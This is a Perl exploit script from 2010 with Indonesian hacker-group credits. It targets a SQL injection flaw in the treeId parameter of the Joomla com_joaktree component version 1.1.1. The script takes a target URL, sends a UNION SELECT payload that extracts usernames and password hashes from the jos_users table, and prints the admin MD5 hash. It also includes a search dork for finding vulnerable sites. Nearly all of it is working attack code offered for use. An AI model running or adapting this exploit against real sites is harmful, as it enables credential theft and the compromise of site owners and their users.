Joomla Joaktree component version 1.1.1 remote SQL injection exploit.
7fb2ea396207fdab0b2d10d9184ea65c1b5651dd6ddf25b25b3686c9aca7e3bd
#!/usr/bin/perl -w
###########################################################################################
#[~] Joomla Component com_joaktree SQL injection Exploit vulnerability - (treeId)
#[~] Author : kaMtiEz (kamzcrew@yahoo.com)
#[~] Homepage : http://www.indonesiancoder.com
#[~] Date : 20 February, 2010
############################################################################################
#
#[ Software Information ]
#
#[+] Vendor : http://joaktree.com/
#[+] Download : http://joaktree.com/index.php/en/joaktree/downloads
#[+] version : 1.1.1 or lower maybe also affected
#[+] Vulnerability : SQL injection
#[+] Dork : inurl:"com_joaktree"
#[+] Type : Free
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_joaktree SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
use LWP::UserAgent;
print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);
$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$Pathloader="version()";
$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$arianom = $IBL13Z . "/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+all+select+1,2,3,".$Pathloader.",5,".$kaMtiEz.",7,8,9,10,11,12,13,14,15,16+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}
##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################